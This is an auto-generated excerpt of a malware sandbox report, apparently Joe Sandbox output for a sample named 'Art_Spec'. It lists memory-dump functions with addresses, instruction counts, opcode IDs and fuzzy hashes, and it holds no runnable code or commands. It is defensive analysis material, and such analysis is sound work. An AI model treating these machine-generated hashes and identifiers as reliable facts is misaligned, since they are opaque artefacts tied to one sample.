                                                        • API String ID:
                                                        • Opcode ID: 20b1c08bbaf025e366db34f7e20b0af472e10f2c6b7ac29ae5c05a953c2829df
                                                        • Instruction ID: 5af444c25d6f3c0a306a49f6d8402c50ab885d006fddab832547db5fdf476e6e
                                                        • Opcode Fuzzy Hash: 20b1c08bbaf025e366db34f7e20b0af472e10f2c6b7ac29ae5c05a953c2829df
                                                        • Instruction Fuzzy Hash: 0911E574D08209DFCB04DFA9D5A0AADFBFAFB88300F10A595D419A7751D374AA42CB80
                                                        Function 05308C78 Relevance: .0, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f93280da44f3826af53da48bef09dd3fc16ed053df5d3321d3e334be71d26ef4
                                                        • Instruction ID: 38f818f39404e2872fd6606879e058c0c8c6aa3ab2367bb7c83be7e658c17b16
                                                        • Opcode Fuzzy Hash: f93280da44f3826af53da48bef09dd3fc16ed053df5d3321d3e334be71d26ef4
                                                        • Instruction Fuzzy Hash: 16012D30756744CFE315CB28C865F55BBB2AF86714F1980E6E1158F6B2DA61DC01CB12
                                                        Function 05308C61 Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 718d48479ba922d591ab48da5468f35352fc6d62c151e62658cd9b8c97e3a1ba
                                                        • Instruction ID: b3a0b4d2c9e715d29412a50e81c75b85708c3bab3171876d80b729f5a3d328df
                                                        • Opcode Fuzzy Hash: 718d48479ba922d591ab48da5468f35352fc6d62c151e62658cd9b8c97e3a1ba
                                                        • Instruction Fuzzy Hash: 2C018F30745744DFD314CB18C855F55BB72AF8A724F1A90E5E2058F6B2D662E802CB01
                                                        Function 009CD759 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118329674.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9cd000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fd156b4411dc7d5d0c2c5013a4fa25e9ef46cc9d1bd21f8a8cb3918fda8e3a8f
                                                        • Instruction ID: 6dbf9ad05fdfc4dd53644b22d7668b1d3d14ff4c5dabd6308520474f922a3fc4
                                                        • Opcode Fuzzy Hash: fd156b4411dc7d5d0c2c5013a4fa25e9ef46cc9d1bd21f8a8cb3918fda8e3a8f
                                                        • Instruction Fuzzy Hash: 6B01DBB1906344EAE7209B15DD84F66FFDCEF51720F18896EED095A286C37D9840C673
                                                        Function 05306438 Relevance: .0, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 067d3aea194e651cae34a12c5d09e034d3320b141c22d7cfe8d4191d25da723c
                                                        • Instruction ID: 47a027c67f05b5c44527d3ac0138234769f433585179ee2d70d3c144e6d9ea42
                                                        • Opcode Fuzzy Hash: 067d3aea194e651cae34a12c5d09e034d3320b141c22d7cfe8d4191d25da723c
                                                        • Instruction Fuzzy Hash: AFF0E23A7102105BEB1A6A3DE8659AA37EADFC526132541B7E50ACB366DD24DC038391
                                                        Function 05306F4C Relevance: .0, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5907d5efee07b288f2ea5c5000b608f9c71c101dedaf250a7aa5d6ce32ce8a3f
                                                        • Instruction ID: 51593bea4a5a677b9f66bcfb6de2d93c6979be2f38ef4d02490b3227581c2a4b
                                                        • Opcode Fuzzy Hash: 5907d5efee07b288f2ea5c5000b608f9c71c101dedaf250a7aa5d6ce32ce8a3f
                                                        • Instruction Fuzzy Hash: 69014C71804319DFDB11CF65C8553AEBBB1FF48390F149169E815EA6E4D3B04A55CBA0
                                                        Function 0530D070 Relevance: .0, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c1e65ea672a6671e7abe029eaaed1cc1ff1df9771af25a3e9c0d57b5a058064
                                                        • Instruction ID: 22cec9c3f23b60175ee1ab0d8ac621764586491d5b146dc6a38509cf8c501cb5
                                                        • Opcode Fuzzy Hash: 4c1e65ea672a6671e7abe029eaaed1cc1ff1df9771af25a3e9c0d57b5a058064
                                                        • Instruction Fuzzy Hash: CFF0447090D308DBC704CFE5C460ABEBBFEEB89304F44B995940D57691D7319A46DB40
                                                        Function 0530DE58 Relevance: .0, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d5b07e22ba4905bebf60ae749505b11e90bea5330f4987dc54b911424158686
                                                        • Instruction ID: df9afefa1efef9a55b6fb190f36fbaba02ade0f8f2d6fe83563cef2e2a17784e
                                                        • Opcode Fuzzy Hash: 2d5b07e22ba4905bebf60ae749505b11e90bea5330f4987dc54b911424158686
                                                        • Instruction Fuzzy Hash: 1D01E974D002499FCB40DFA8C490AAEBBF4FB48300F10819AE854E3380D7349A40CBA0
                                                        Function 009CD758 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118329674.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9cd000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 802818b9c4e0261d965afa9a3e0d777cb9c50f4814a512cc3b1c06d700cc48b2
                                                        • Instruction ID: 202e94cecf4807cd1e08d914b49c62faa623a57e073cf36b4b0ff6bf8e51d009
                                                        • Opcode Fuzzy Hash: 802818b9c4e0261d965afa9a3e0d777cb9c50f4814a512cc3b1c06d700cc48b2
                                                        • Instruction Fuzzy Hash: 1CF06272405344AEE7208F16DC84B66FBACEF91724F18C55AED495A286C379AC44CAB2
                                                        Function 0530E5D0 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 97a5b92bbf89c08ee398367a00313b46ca1e20bd9a323b57ba9f222b88fe990b
                                                        • Instruction ID: bf9df21144ef6b8789da7ddb4dd148e8ed67acf6b822177456a781c4868c1082
                                                        • Opcode Fuzzy Hash: 97a5b92bbf89c08ee398367a00313b46ca1e20bd9a323b57ba9f222b88fe990b
                                                        • Instruction Fuzzy Hash: 71F0F630A0820ECBD704EB68E4647AE3BBEEB89300F009A25C005A23C5DA71AD429B11
                                                        Function 05306448 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 92c6502b084e256a8749f007f8caa4198c9f7d49239f2c019148c09b9cd7d2ff
                                                        • Instruction ID: efdcf9e596275fda7638922245df95d686ae06b055fc4358e649e3238b7e569f
                                                        • Opcode Fuzzy Hash: 92c6502b084e256a8749f007f8caa4198c9f7d49239f2c019148c09b9cd7d2ff
                                                        • Instruction Fuzzy Hash: BAF027347002109B9B58AA3EA43482B32EB9FC82603240076E606C7354DD38DC018390
                                                        Function 05306F58 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1de68a2e8e6b049eb3dd3cb54cea2a93d052fc42d1a953ba8a9df0b4f10a65fb
                                                        • Instruction ID: 8e80d29afb1daa71fcbfdfbe97e94d15c6e6a104a6ce49259da7b3abd6c1af65
                                                        • Opcode Fuzzy Hash: 1de68a2e8e6b049eb3dd3cb54cea2a93d052fc42d1a953ba8a9df0b4f10a65fb
                                                        • Instruction Fuzzy Hash: A101FF70800319DFDB14CF55C4157AEBAF5FF44390F14D129E425AA294D7B44A50CFE0
                                                        Function 05308190 Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b9d98e973191bf9ec5dc32323bc8dbdb6cdddcef2734144e562b901c10245c4f
                                                        • Instruction ID: fcaeb3376c95e9190c5787a54a83e9841c87d297895b128288a1389ca9bc7b20
                                                        • Opcode Fuzzy Hash: b9d98e973191bf9ec5dc32323bc8dbdb6cdddcef2734144e562b901c10245c4f
                                                        • Instruction Fuzzy Hash: 55F0E2726082486FCF09EF58DC60CAA7FBAEF06224B0581BBF004D7262D631E900C758
                                                        Function 05306FF8 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 19693e4e18da096f5a7da1283a537e48d931f32b52eb0538cd0ddc4a9cb87c41
                                                        • Instruction ID: d9f9ce74e1382eb32cbe504f5526ed53882b8a6b1573d087f704c5563f6aeb60
                                                        • Opcode Fuzzy Hash: 19693e4e18da096f5a7da1283a537e48d931f32b52eb0538cd0ddc4a9cb87c41
                                                        • Instruction Fuzzy Hash: 62E06D76B002286F9314DA6EEC84D6BBBEEFBCC670355807AF508C7310D9319C01C6A0
                                                        Function 0530CC60 Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0eab1762629b91cbb35a370b2c4f8bb5f87a9acd245dc035871eef6d771a48e1
                                                        • Instruction ID: dc43245db178687a7ebf4da0e70b266937a39eff2e0640d66425a8ed605c506d
                                                        • Opcode Fuzzy Hash: 0eab1762629b91cbb35a370b2c4f8bb5f87a9acd245dc035871eef6d771a48e1
                                                        • Instruction Fuzzy Hash: 21F01774D042089BD718CFAAD8149AEBBBABFC9300F00D12AE815677A4CB705846CB90
                                                        Function 0530FEA0 Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ba9e26bfbfb463e7ca4499a8bb9b8b9520befcc8819717ed5d177c1b61686785
                                                        • Instruction ID: ea5535619c7f8ad74c4f0f9e82dda197611b54b79c81ede7570d2f8d64b92827
                                                        • Opcode Fuzzy Hash: ba9e26bfbfb463e7ca4499a8bb9b8b9520befcc8819717ed5d177c1b61686785
                                                        • Instruction Fuzzy Hash: FFF03974D0120CEFCB54EFA8D404A8DBBB5EB88301F00C0AAA818A3350D734AA51DF81
                                                        Function 05308169 Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 51415fa8837cb084e95acd44c1e8b69ab6e1709dd5c8f73ce6dd1205a332d53f
                                                        • Instruction ID: 4f48f96cc663c4f52e765609d995f7fff641b59671818ab21aea23b805b23257
                                                        • Opcode Fuzzy Hash: 51415fa8837cb084e95acd44c1e8b69ab6e1709dd5c8f73ce6dd1205a332d53f
                                                        • Instruction Fuzzy Hash: 18E0E21629E3D4AFD30B66700CA9558BF308E5320070A90EBD688CA1F3C129891B8767
                                                        Function 05303ADF Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 79e38ec4dff4a6a246a358df77c4187df1ea86c54934096ef7afe8d5eb7907d2
                                                        • Instruction ID: a1da2e49822267cd986020a14f0c32187d0d1e86ae57260867d9b1747ab3d07f
                                                        • Opcode Fuzzy Hash: 79e38ec4dff4a6a246a358df77c4187df1ea86c54934096ef7afe8d5eb7907d2
                                                        • Instruction Fuzzy Hash: A2C08036085151DEC603DF908564C5F7F69FF953007489C67D18447162C631C02ED716
                                                        Function 053068D0 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f365f89242077b78396c93d5a490c51987e2d96eae0dfabe1bb59e8fd8e954a9
                                                        • Instruction ID: 7bca72b645cbc88034526f0537227462560015f4578063ba536ffe4b0eabf97f
                                                        • Opcode Fuzzy Hash: f365f89242077b78396c93d5a490c51987e2d96eae0dfabe1bb59e8fd8e954a9
                                                        • Instruction Fuzzy Hash: A5C0127B4082405FD3039B90C4968417FA0EE5520074584F6D0548A0738521441BEB16
                                                        Function 0530A978 Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 68cfaa78efa19a83351dc26b89368f3311c342db2e950b3cd5a06430fbb35222
                                                        • Instruction ID: 0c017bdd0e40f19d6354243738062e802c2b282941e0fbcfaadfbe5dfbf717f0
                                                        • Opcode Fuzzy Hash: 68cfaa78efa19a83351dc26b89368f3311c342db2e950b3cd5a06430fbb35222
                                                        • Instruction Fuzzy Hash: 72C08C300007088BD6102FB0B82C36C7368EB80202F004021A40A015A08BA8A8E1C611
                                                        Function 0530728C Relevance: .0, Instructions: 8COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c2319e57912522ef8273aee5c818b927dffc765d1441c19d144fe5eb388fa697
                                                        • Instruction ID: e56293ef1ef04d9e8efc79dfbb73be7230c75e006999011ced7f3868ca57e7f0
                                                        • Opcode Fuzzy Hash: c2319e57912522ef8273aee5c818b927dffc765d1441c19d144fe5eb388fa697
                                                        • Instruction Fuzzy Hash: AEB01275395340E2A006777848FCA3FB925EFF1701B50AC597305109C8C4309824931F

                                                        Non-executed Functions

                                                        Function 05303D30 Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !Y3E
                                                        • API String ID: 0-2826621527
                                                        • Opcode ID: 77c334b19d772439abdbf069b23d28ee98d1d232421f3ad85177c8140f8de275
                                                        • Instruction ID: 51059ca47fd9cbaee20918e7af5d7250548b23b016acb18fe1f309af3d66ba71
                                                        • Opcode Fuzzy Hash: 77c334b19d772439abdbf069b23d28ee98d1d232421f3ad85177c8140f8de275
                                                        • Instruction Fuzzy Hash: D9A18E34B002049FDB08DF79D868B6EBAA7FBC8700F24846AE506EB795DE74DD018B51
                                                        Function 05302460 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ax^
                                                        • API String ID: 0-994873808
                                                        • Opcode ID: ee3352c3e34d3760c25a173f477cf24dd73f898255dd8e02d2bc9de9938fd1be
                                                        • Instruction ID: 654b8a970f02d001e7c27d051f6dcf257be1e1506cf60cedf2b0250c51388486
                                                        • Opcode Fuzzy Hash: ee3352c3e34d3760c25a173f477cf24dd73f898255dd8e02d2bc9de9938fd1be
                                                        • Instruction Fuzzy Hash: 8C41A979F2430A8FCB40CF99C89595FF7F6BB88200B159026E905EB790D274D9118B91
                                                        Function 05302459 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ax^
                                                        • API String ID: 0-994873808
                                                        • Opcode ID: 728455e809bd1d7fc37301a2743e17c57eeae428f89a958781c72591839f2450
                                                        • Instruction ID: 4b8334915b8c9d82bad2b9702165ec988505026544430cb146e00c627617bc0c
                                                        • Opcode Fuzzy Hash: 728455e809bd1d7fc37301a2743e17c57eeae428f89a958781c72591839f2450
                                                        • Instruction Fuzzy Hash: 6041A779F2430A8FCB44CF99C8995AFFBF6BB88200F159026E905E7790D234C911CB91
                                                        Function 047C5D30 Relevance: .3, Instructions: 337COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fdcaf17160b1bc9d5dbbaa39615c4ce00403c0fa8bd7d6cf2732af5adf8f991a
                                                        • Instruction ID: 598e9e8ecb5cc2b07e01c837481fba44c87b3993ca10cacac4bb42d49e3457de
                                                        • Opcode Fuzzy Hash: fdcaf17160b1bc9d5dbbaa39615c4ce00403c0fa8bd7d6cf2732af5adf8f991a
                                                        • Instruction Fuzzy Hash: E7C19931701610AFEB29DB76C960B6EB7EAAFC8704F14846DD14A9B391CB36F801CB51
                                                        Function 047C1198 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6304b4ed9873feab66d7f0daca577462f82a74fa9956d11a495268084dd3974c
                                                        • Instruction ID: ccd8628847cc487b531ec9a1b9721bde547c97c193a57dab816c46161658c1b7
                                                        • Opcode Fuzzy Hash: 6304b4ed9873feab66d7f0daca577462f82a74fa9956d11a495268084dd3974c
                                                        • Instruction Fuzzy Hash: 42E11A74E002598FDB14DFA9C580AAEFBF2FF89305F648169D415AB356D730A942CFA0
                                                        Function 0530F630 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a2bb17ba9e3fbcb1943d0fad7b9e6889c34f86b1bfca9b3372f0bd83e5088c4c
                                                        • Instruction ID: 117101f6ebf928f611438aa76ed6598b6776154ff4b10211f442a781c03159ea
                                                        • Opcode Fuzzy Hash: a2bb17ba9e3fbcb1943d0fad7b9e6889c34f86b1bfca9b3372f0bd83e5088c4c
                                                        • Instruction Fuzzy Hash: DEE12874E102198FDB24DFA9C590AAEFBF2FF89304F248169D414AB356D730A942CF61
                                                        Function 0530FA68 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aa2a20097a57d3ddaa46232d2cb68d022509e53683baaeb36bd10d6fe05ec605
                                                        • Instruction ID: a50ea538f8a6cfb20d4b1bf8b3f69b0ce8388d642f1b2fbe0f4374323bfc3b97
                                                        • Opcode Fuzzy Hash: aa2a20097a57d3ddaa46232d2cb68d022509e53683baaeb36bd10d6fe05ec605
                                                        • Instruction Fuzzy Hash: 38E11C74E142598FDB24DFA9C590AAEFBF2FF89304F248169D414AB355D730A942CF60
                                                        Function 047C6C58 Relevance: .3, Instructions: 298COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e57517afa689e2ef216b4e7ae37f06fc0fcd0652675a82ce9b139b71346532b7
                                                        • Instruction ID: bcb2367edcc637b83570ffd3007b0c338c2abf8575b96610f40475bbc3b5e40f
                                                        • Opcode Fuzzy Hash: e57517afa689e2ef216b4e7ae37f06fc0fcd0652675a82ce9b139b71346532b7
                                                        • Instruction Fuzzy Hash: 48D19074A00609CFDB18DF69C598AA9B7F2BF8C705F2580ADE505AB361DB31AD40CF60
                                                        Function 053027EB Relevance: .3, Instructions: 273COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 961b2979f3df7e0398b5d198b8e95bcebde685c3553daac4c88864d38bdab577
                                                        • Instruction ID: be02640a81c31db7278c94a6710ed3573f2ed2f45eebac9ce61e55c5268a33e6
                                                        • Opcode Fuzzy Hash: 961b2979f3df7e0398b5d198b8e95bcebde685c3553daac4c88864d38bdab577
                                                        • Instruction Fuzzy Hash: B6B191386107008FD705EF78D468A9ABBF6FF89300B1595AEE05A9B362DB30ED45CB51
                                                        Function 0530279F Relevance: .3, Instructions: 272COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f8a6fa13ebbaa9e2c36602e6abb3eddc42609da4cc8022d32ef32651ba04037c
                                                        • Instruction ID: 8edd8723b50f5940d4ea0a5387b7296e5899ac35a59a2c192711984ace5d9b9c
                                                        • Opcode Fuzzy Hash: f8a6fa13ebbaa9e2c36602e6abb3eddc42609da4cc8022d32ef32651ba04037c
                                                        • Instruction Fuzzy Hash: 03B191396007008FD706EF78D468A9A7BF6FF89300B5594AEE05A9B362DB30ED45CB51
                                                        Function 05307967 Relevance: .3, Instructions: 271COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6c83dd37ae436aa20de6db1681842c7bed5d081911c176bb0521ef91b54f0999
                                                        • Instruction ID: 52af608c273416837a87d656c80366ff115a178d115458828cb0a13714a2ec8c
                                                        • Opcode Fuzzy Hash: 6c83dd37ae436aa20de6db1681842c7bed5d081911c176bb0521ef91b54f0999
                                                        • Instruction Fuzzy Hash: 1ED1F435D1065ACADB01EFA4D8A0B99B771FFD6300F10C79AE1493B211EB746AC9CB81
                                                        Function 00A7D364 Relevance: .3, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
